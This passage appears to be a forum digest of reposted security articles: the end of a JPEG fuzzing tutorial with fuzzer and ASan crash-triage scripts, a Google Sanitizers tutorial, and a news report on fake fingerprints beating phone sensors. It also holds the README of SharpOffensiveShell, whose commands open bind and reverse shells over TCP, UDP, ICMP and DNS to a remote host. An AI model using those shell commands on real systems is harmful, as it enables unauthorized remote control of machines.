We can further analyze by comparing them with a program called Beyond Compare or bcompare. We’ll get two hexdumps with differences highlighted. As you can see, in just this one screen share we have 3 different bytes that have had their bits flipped. The original is on the left, the mutated sample is on the right. This mutation method appears to have worked. Let’s move on to implementing our second mutation method. Gynvael’s Magic Numbers During the aforementioned GynvaelColdwind ‘Basics of fuzzing’ stream, he enumerates several ‘magic numbers’ which can have devastating effects on programs. Typically, these numbers relate to data type sizes and arithmetic-induced errors. The numbers discussed were: 0xFF 0x7F 0x00 0xFFFF 0x0000 0xFFFFFFFF 0x00000000 0x80000000 <-- minimum signed 32-bit int 0x40000000 <-- just half of that amount 0x7FFFFFFF <-- maximum signed 32-bit int If there is any kind of arithmetic performed on these types of values in the course of malloc() or other operations, overflows can be common. For instance, if you add 0x1 to 0xFF in a one-byte register, it rolls over to 0x00, which can be unintended behavior. HEVD actually has an integer overflow bug similar to this concept. Let’s say our fuzzer chooses 0x7FFFFFFF as the magic number it wants to use. That value is 4 bytes long, so we would have to find a byte index in our array and overwrite that byte plus the next three. Let’s go ahead and start implementing this in our fuzzer. Implementing Mutation Method #2 First we’ll want to create a list of tuples like Gynvael did, where the first number in the tuple is the byte-size of the magic number and the second number is the decimal value of its first byte. def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) print(picked_magic) If we run this we can see that it’s randomly selecting a magic value tuple. 
root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 64) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 128) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) root@kali:~# python3 fuzzer.py Canon_40D.jpg (2, 255) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) We now need to overwrite a random 1 to 4 byte value in the JPEG with this new magic 1 to 4 byte value. We will set up our possible indexes the same as the previous method, select an index, and then overwrite the bytes at that index with our picked_magic number. So if we get (4, 128) for instance, we know it’s 4 bytes, and the magic number is 0x80000000. So we’ll do something like: byte[x] = 128 byte[x+1] = 0 byte[x+2] = 0 byte[x+3] = 0 All in all, our function will look like this: def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that begin (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 
3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data Analyzing Mutation #2 Running our script now and analyzing the results in Beyond Compare, we can see that a two-byte value of 0xA6 0x76 was overwritten with 0xFF 0xFF. This is exactly what we wanted to accomplish. Starting to Fuzz Now that we have two reliable ways of mutating the data, we need to: mutate the data with one of our functions, create a new picture with the mutated data, feed the mutated picture to our binary for parsing, catch any Segmentation faults and log the picture that caused it Victim? For our victim program, we will search Google with site:github.com "exif" language:c to find Github projects written in C that have a reference to ‘exif’. A quick looksie brings us to https://github.com/mkttanabe/exif. We can install by git cloning the repo and following the ‘building with gcc’ instructions included in the README. (I’ve placed the compiled binary in /usr/bin just for ease.) Let’s first see how the program handles our valid JPEG. 
root@kali:~# exif Canon_40D.jpg -verbose system: little-endian data: little-endian [Canon_40D.jpg] createIfdTableArray: result=5 {0TH IFD} tags=11 tag[00] 0x010F Make type=2 count=6 val=[Canon] tag[01] 0x0110 Model type=2 count=14 val=[Canon EOS 40D] tag[02] 0x0112 Orientation type=3 count=1 val=1 tag[03] 0x011A XResolution type=5 count=1 val=72/1 tag[04] 0x011B YResolution type=5 count=1 val=72/1 tag[05] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[06] 0x0131 Software type=2 count=11 val=[GIMP 2.4.5] tag[07] 0x0132 DateTime type=2 count=20 val=[2008:07:31 10:38:11] tag[08] 0x0213 YCbCrPositioning type=3 count=1 val=2 tag[09] 0x8769 ExifIFDPointer type=4 count=1 val=214 tag[10] 0x8825 GPSInfoIFDPointer type=4 count=1 val=978 {EXIF IFD} tags=30 tag[00] 0x829A ExposureTime type=5 count=1 val=1/160 tag[01] 0x829D FNumber type=5 count=1 val=71/10 tag[02] 0x8822 ExposureProgram type=3 count=1 val=1 tag[03] 0x8827 PhotographicSensitivity type=3 count=1 val=100 tag[04] 0x9000 ExifVersion type=7 count=4 val=0 2 2 1 tag[05] 0x9003 DateTimeOriginal type=2 count=20 val=[2008:05:30 15:56:01] tag[06] 0x9004 DateTimeDigitized type=2 count=20 val=[2008:05:30 15:56:01] tag[07] 0x9101 ComponentsConfiguration type=7 count=4 val=0x01 0x02 0x03 0x00 tag[08] 0x9201 ShutterSpeedValue type=10 count=1 val=483328/65536 tag[09] 0x9202 ApertureValue type=5 count=1 val=368640/65536 tag[10] 0x9204 ExposureBiasValue type=10 count=1 val=0/1 tag[11] 0x9207 MeteringMode type=3 count=1 val=5 tag[12] 0x9209 Flash type=3 count=1 val=9 tag[13] 0x920A FocalLength type=5 count=1 val=135/1 tag[14] 0x9286 UserComment type=7 count=264 val=0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (omitted) tag[15] 0x9290 SubSecTime type=2 count=3 val=[00] tag[16] 0x9291 SubSecTimeOriginal type=2 count=3 val=[00] tag[17] 0x9292 SubSecTimeDigitized type=2 count=3 val=[00] tag[18] 0xA000 FlashPixVersion type=7 count=4 val=0 1 0 0 tag[19] 0xA001 ColorSpace type=3 count=1 val=1 tag[20] 
0xA002 PixelXDimension type=4 count=1 val=100 tag[21] 0xA003 PixelYDimension type=4 count=1 val=68 tag[22] 0xA005 InteroperabilityIFDPointer type=4 count=1 val=948 tag[23] 0xA20E FocalPlaneXResolution type=5 count=1 val=3888000/876 tag[24] 0xA20F FocalPlaneYResolution type=5 count=1 val=2592000/583 tag[25] 0xA210 FocalPlaneResolutionUnit type=3 count=1 val=2 tag[26] 0xA401 CustomRendered type=3 count=1 val=0 tag[27] 0xA402 ExposureMode type=3 count=1 val=1 tag[28] 0xA403 WhiteBalance type=3 count=1 val=0 tag[29] 0xA406 SceneCaptureType type=3 count=1 val=0 {Interoperability IFD} tags=2 tag[00] 0x0001 InteroperabilityIndex type=2 count=4 val=[R98] tag[01] 0x0002 InteroperabilityVersion type=7 count=4 val=0 1 0 0 {GPS IFD} tags=1 tag[00] 0x0000 GPSVersionID type=1 count=4 val=2 2 0 0 {1ST IFD} tags=6 tag[00] 0x0103 Compression type=3 count=1 val=6 tag[01] 0x011A XResolution type=5 count=1 val=72/1 tag[02] 0x011B YResolution type=5 count=1 val=72/1 tag[03] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[04] 0x0201 JPEGInterchangeFormat type=4 count=1 val=1090 tag[05] 0x0202 JPEGInterchangeFormatLength type=4 count=1 val=1378 0th IFD : Model = [Canon EOS 40D] Exif IFD : DateTimeOriginal = [2008:05:30 15:56:01] We see that the program is parsing out the tags and stating the byte values associated with them. This is pretty much exactly what we set out to find. Chasing Segfaults Ideally we’d like to feed this binary some mutated data and have it segfault meaning we have found a bug. The problem I ran into was that when I monitored stdout and stderr for the Segmentation fault message, it never appeared. That’s because the Segmentation fault message comes from our command shell instead of the binary. It means the shell received a SIGSEGV signal and in response prints the message. One way I found to monitor this was to use the run() method from the pexpect Python module and the quote() method from the pipes Python module. 
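Before settling on pexpect, it's worth knowing a hypothetical alternative: on POSIX systems, Python's standard subprocess module encodes death-by-signal as a negative return code, so a segfault can be detected without scraping the shell's output at all. A sketch (this is not the approach the fuzzer below uses):

```python
import signal
import subprocess

def crashed(argv):
    # On POSIX, a child killed by a signal gets returncode == -signum,
    # so SIGSEGV shows up as -11 -- no shell message parsing required.
    result = subprocess.run(argv, stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL)
    return result.returncode == -signal.SIGSEGV

# e.g. crashed(["exif", "mutated.jpg", "-verbose"])
```

The upside is zero dependencies; the downside is that it won't catch crashes that a wrapper shell swallows.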
We’ll add a new function that takes a counter parameter (which fuzzing iteration we’re on) and the mutated data in another parameter. If we see Segmentation in the output of our run() command, we’ll write the mutated data to a file and save it so that we have the JPEG image that crashed the binary. Let’s create a new folder called crashes and we’ll save JPEGs in there that cause crashes in the format crash.<fuzzing iteration (counter)>.jpg. So if fuzzing iteration 100 caused a crash, we should get a file like: /crashes/crash.100.jpg. We’ll keep printing to the same line in the terminal to keep a count of every 100 fuzzing iterations. Our function looks like this: def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") Next, we’ll alter our execution stub at the bottom of our script to run on a counter. Once we hit 1000 iterations, we’ll stop fuzzing. We’ll also have our fuzzer randomly select one of our mutation methods. So it might bit-flip or it might use a magic number. Let’s run it and then check our crashes folder when it completes. Once the fuzzer completes, you can see we got ~30 crashes! root@kali:~/crashes# ls crash.102.jpg crash.317.jpg crash.52.jpg crash.620.jpg crash.856.jpg crash.129.jpg crash.324.jpg crash.551.jpg crash.694.jpg crash.861.jpg crash.152.jpg crash.327.jpg crash.559.jpg crash.718.jpg crash.86.jpg crash.196.jpg crash.362.jpg crash.581.jpg crash.775.jpg crash.984.jpg crash.252.jpg crash.395.jpg crash.590.jpg crash.785.jpg crash.985.jpg crash.285.jpg crash.44.jpg crash.610.jpg crash.84.jpg crash.987.jpg We can test this now with a quick one-liner to confirm the results: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done 
Remember, we can route both STDOUT and STDERR to /dev/null because “Segmentation fault” comes from the shell, not from the binary. We run this and this is the output: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault -----SNIP----- You can’t see all of them, but that’s 30 segfaults, so everything appears to be working as planned! Triaging Crashes Now that we have ~30 crashes and the JPEGs that caused them, the next step would be to analyze these crashes and figure out how many of them are unique. This is where we’ll leverage some of the things I’ve learned watching Brandon Faulk’s streams. A quick look at the crash samples in Beyond Compare tells me that most were caused by our bit_flip() mutation and not the magic() mutation method. Interesting. As a test, while we progress, we can turn off the randomness of the function selection and run, let’s say, 100,000 iterations with just the magic() mutator and see if we get any crashes. Using ASan to Analyze Crashes ASan is the “Address Sanitizer”, a utility that comes with newer versions of gcc and allows users to compile a binary with the -fsanitize=address switch and get very detailed information in the event that a memory access bug occurs, even one that doesn’t cause a crash. Obviously we’ve pre-selected for crashing inputs here, so we will miss out on that utility, but perhaps we’ll save it for another time. To use ASan, I followed along with the Fuzzing Project and recompiled exif with the flags: cc -fsanitize=address -ggdb -o exifsan sample_main.c exif.c. I then moved exifsan to /usr/bin for ease of use. If we run this newly compiled binary on a crash sample, let’s see the output. 
root@kali:~/crashes# exifsan crash.252.jpg -verbose system: little-endian data: little-endian ================================================================= ==18831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb4d00758 at pc 0x00415b9e bp 0xbf8c91f8 sp 0xbf8c91ec READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) 0xb4d00758 is located 0 bytes to the right of 8-byte region [0xb4d00750,0xb4d00758) allocated by thread T0 here: #0 0xb7aa2097 in __interceptor_malloc (/lib/i386-linux-gnu/libasan.so.5+0x10c097) #1 0x415a9f in parseIFD /root/exif/exif.c:2348 #2 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #3 0x4076ba in main /root/exif/sample_main.c:63 #4 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/exif/exif.c:2356 in parseIFD Shadow bytes around the buggy address: 0x369a0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x369a00e0: fa fa fa fa fa fa fa fa fa fa 00[fa]fa fa 04 fa 0x369a00f0: fa fa 00 06 fa fa 06 fa fa fa fa fa fa fa fa fa 0x369a0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right 
redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==18831==ABORTING This is wonderful. Not only do we get detailed information, but ASan also classifies the bug class for us, tells us the crash address, and provides a nice stack trace. As you can see, we were performing a 4-byte read operation in the parseIFD function inside of exif.c. READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) Since this is all standard binary output now, we can actually triage these crashes and try to make sense of them. Let’s first try to deduplicate the crashes. It’s possible here that all 30 of our crashes are the same bug. It’s also possible that we have 30 unique crashes (not likely lol). So we need to sort that out. Let’s again appeal to a Python script: we’ll iterate through this folder, run the ASan-enabled binary against each crash, and log the crashing address for each. We’ll also try to capture whether it’s a 'READ' or 'WRITE' operation. So for example, for crash.252.jpg, we’ll format the log file as: crash.252.HBO.b4f00758.READ and we’ll write the ASan output to the log. This way we know the crash image that caused it, the bug class, the address, and the operation before we even open the log. (I’ll post the triage script at the end, it’s so gross ugh, I hate it.) After running the triage script on our crashes folder, we can now see we have triaged our crashes and there is something very interesting. 
crash.102.HBO.b4f006d4.READ crash.102.jpg crash.129.HBO.b4f005dc.READ crash.129.jpg crash.152.HBO.b4f005dc.READ crash.152.jpg crash.317.HBO.b4f005b4.WRITE crash.317.jpg crash.285.SEGV.00000000.READ crash.285.jpg ------SNIP----- After a big SNIP there, out of my 30 crashes, I only had one WRITE operation. You can’t tell from the snipped output but I also had a lot of SEGV bugs where a NULL address was referenced (0x00000000). Let’s also check in on our modified fuzzer that was running only the magic() mutator for 100,000 iterations and see if it turned up any bugs. root@kali:~/crashes2# ls crash.10354.jpg crash.2104.jpg crash.3368.jpg crash.45581.jpg crash.64750.jpg crash.77850.jpg crash.86367.jpg crash.94036.jpg crash.12771.jpg crash.21126.jpg crash.35852.jpg crash.46757.jpg crash.64987.jpg crash.78452.jpg crash.86560.jpg crash.9435.jpg crash.13341.jpg crash.23547.jpg crash.39494.jpg crash.46809.jpg crash.66340.jpg crash.78860.jpg crash.88799.jpg crash.94770.jpg crash.14060.jpg crash.24492.jpg crash.40953.jpg crash.49520.jpg crash.6637.jpg crash.79019.jpg crash.89072.jpg crash.95438.jpg crash.14905.jpg crash.25070.jpg crash.41505.jpg crash.50723.jpg crash.66389.jpg crash.79824.jpg crash.89738.jpg crash.95525.jpg crash.18188.jpg crash.27783.jpg crash.41700.jpg crash.52051.jpg crash.6718.jpg crash.81206.jpg crash.90506.jpg crash.96746.jpg crash.18350.jpg crash.2990.jpg crash.43509.jpg crash.54074.jpg crash.68527.jpg crash.8126.jpg crash.90648.jpg crash.98727.jpg crash.19441.jpg crash.30599.jpg crash.43765.jpg crash.55183.jpg crash.6987.jpg crash.82472.jpg crash.90745.jpg crash.9969.jpg crash.19581.jpg crash.31243.jpg crash.43813.jpg crash.5857.jpg crash.70713.jpg crash.83282.jpg crash.92426.jpg crash.19907.jpg crash.31563.jpg crash.44974.jpg crash.59625.jpg crash.77590.jpg crash.83284.jpg crash.92775.jpg crash.2010.jpg crash.32642.jpg crash.4554.jpg crash.64255.jpg crash.77787.jpg crash.84766.jpg crash.92906.jpg That’s a lot of crashes! 
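All of those samples will need the same deduplication treatment. Given triage log names in the crash.&lt;iteration&gt;.&lt;class&gt;.&lt;address&gt;.&lt;operation&gt; format described above, bucketing them by crash site is nearly a one-liner with collections.Counter. A sketch of the idea (not part of the triage script):

```python
from collections import Counter

def crash_buckets(log_names):
    # Two logs with the same (bug class, address, operation) triple are
    # almost certainly the same underlying bug; the iteration number is
    # irrelevant for dedup, so it gets sliced away.
    return Counter(tuple(name.split(".")[2:5]) for name in log_names)
```

Feeding it the triage log names gives a quick count of unique crash sites and how often each was hit.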
Getting Serious, Conclusion The fuzzer could be optimized a ton, it’s really crude at the moment and only meant to demonstrate very basic mutation fuzzing. The bug triaging process is also a mess and felt really hacky the whole way, I guess I need to watch some more @gamozolabs streams. Maybe next time we do fuzzing we’ll try a harder target, write the fuzzer in a cool language like Rust or Go, and we’ll try to really refine the triaging process/exploit one of the bugs! Thanks to everyone referenced in the blogpost, huge thanks. Until next time! Code JPEGfuzz.py #!/usr/bin/env python3 import sys import random from pexpect import run from pipes import quote # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), 
(4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that begin (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, 
end="\r") if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] counter = 0 while counter < 100000: data = get_bytes(filename) functions = [0, 1] picked_function = random.choice(functions) if picked_function == 0: mutated = magic(data) create_new(mutated) exif(counter,mutated) else: mutated = bit_flip(data) create_new(mutated) exif(counter,mutated) counter += 1 triage.py #!/usr/bin/env python3 import os from os import listdir def get_files(): files = os.listdir("/root/crashes/") return files def triage_files(files): for x in files: original_output = os.popen("exifsan " + x + " -verbose 2>&1").read() output = original_output # Getting crash reason crash = '' if "SEGV" in output: crash = "SEGV" elif "heap-buffer-overflow" in output: crash = "HBO" else: crash = "UNKNOWN" if crash == "HBO": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 target_line = target_line.split(" ") address = target_line[5].replace("0x","") target_line2 = target_line2.split(" ") operation = target_line2[0] elif crash == "SEGV": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 if "unknown address" in target_line: address = "00000000" else: address = None if "READ" in target_line2: operation = "READ" elif "WRITE" in target_line2: operation = "WRITE" else: operation = None log_name = (x.replace(".jpg","") + "." + crash + "." + address + "." 
+ operation) f = open(log_name,"w+") f.write(original_output) f.close() files = get_files() triage_files(files) Tags: exif fuzzing jpeg mutation parsing Python Updated: April 04, 2020 Source: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/#
  22. Detect Bugs using Google Sanitizers
Apr 03, 2019 Shawn Tutorials
Google Sanitizers are a set of dynamic code analysis tools to detect common bugs in your code, including:
Thread Sanitizer: detects data races, thread leaks, deadlocks
Address Sanitizer: detects buffer overflows, dangling pointer dereferences
Leak Sanitizer: part of Address Sanitizer, detects memory leaks
Undefined Behavior Sanitizer: detects integer overflow, floating-point overflow
Memory Sanitizer: detects uninitialized memory reads
Preparation
For Windows users, install gcc with MinGW, or install Clang. For Mac users, install Clang using `xcode-select --install`. For Linux users, make sure you have gcc installed. Open CLion and make sure that the run button is clickable with toolchains configured correctly.
Run Program with Sanitizer
To run a program with a sanitizer, we need to pass a special -fsanitize flag to the compiler. Common options include: -fsanitize=address, -fsanitize=thread, -fsanitize=memory, -fsanitize=undefined, -fsanitize=leak. A full list of options can be found here. Note that it is not possible to combine more than one of the -fsanitize=address, -fsanitize=thread, and -fsanitize=memory checkers in the same program, so you may need to toggle the options multiple times for comprehensive checking. For testing, let's add the following line to the CMakeLists.txt file:
set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g")
When you run the code, you should be able to see a sanitizer tab next to the console.
Thread Sanitizer Example
Here is a poorly-written multithreading program:

int counter = 0;
pthread_mutex_t lock;

void *inc() {
    pthread_mutex_lock(&lock);   // lock not initialized
    counter++;                   // thread contention
    pthread_mutex_unlock(&lock);
    return NULL;
}

void thread_bugs() {
    pthread_t tid;
    for (int i = 0; i < 2; ++i)
        pthread_create(&tid, NULL, inc, NULL);
    printf("%d", counter);   // print the result before join
    pthread_join(tid, NULL); // the first thread is not joined
}

Add the following line to the CMakeLists.txt to enable the Thread Sanitizer:
set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=thread -g")
When the program is executing, the sanitizer will generate a report for thread-related bugs. Be aware that your program might run significantly slower with sanitizers enabled. The sanitizer noticed that two threads are reading/writing to the same memory location at the line counter++;, since the lock is used before being initialized. There is also a data race between counter++ and the print statement since the main thread did not wait for one of the child threads. Finally, there is a thread leak for the same reason.
Address Sanitizer Example
To enable the Address Sanitizer, you need to add the following line to the CMakeLists.txt
set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g")
It helps you detect heap overflow, which may happen when you incorrectly calculate the size. Here is an example of overflowing a stack-allocated array. The Address Sanitizer also checks for using freed pointers. Note that it shows you where the memory is allocated and freed. Here is a silly example of freeing the same memory twice, but it will be less noticeable when different pointers are pointing to the same heap location.
References
https://clang.llvm.org/docs/UsersManual.html
https://www.jetbrains.com/help/clion/google-sanitizers.html
Sursa: https://shawnzhong.com/2019/04/03/detect-bugs-using-google-sanitizers/
  23. SharpOffensiveShell
A sort of simple shell which supports multiple protocols. This project is just for improving my C# coding ability. The SharpOffensiveShell DNS mode uses the native Windows API instead of the nslookup command to perform DNS requests.
QuickStart
SharpOffensiveShell supports .NET Framework 2.0:
csc SharpOffensiveShell.cs
TCP
For bind shell:
sharpoffensiveshell.exe tcp listen 0.0.0.0 8080
ncat -v 1.1.1.1 8080
For reverse shell:
ncat -lvp 8080
sharpoffensiveshell.exe tcp connect 1.1.1.1 8080
UDP
For bind shell:
sharpoffensiveshell.exe udp listen 0.0.0.0 8080
ncat -u -v 1.1.1.1 8080
For reverse shell:
ncat -u -lvp 8080
When the reverse connection is accepted, press Enter to make the prompt display.
sharpoffensiveshell.exe udp connect 1.1.1.1 8080
ICMP
git clone https://github.com/inquisb/icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP
sharpoffensiveshell.exe icmp connect listenIP
DNS
pip install dnslib
git clone https://github.com/sensepost/DNS-Shell
For direct mode:
python DNS-Shell.py -l -d [Server IP]
sharpoffensiveshell.exe dns direct ServerIP Domain
For recursive mode:
DNS-Shell.py -l -r [Domain]
sharpoffensiveshell.exe dns recurse Domain
Sursa: https://github.com/darkr4y/SharpOffensiveShell
  24. Attackers can bypass fingerprint authentication with an ~80% success rate
Fingerprint-based authentication is fine for most people, but it's hardly foolproof.
Dan Goodin - 4/8/2020, 4:00 PM
For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.
Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.
A very high probability
A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time. The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create.
While Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.
Wednesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.
“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking," Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person's privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”
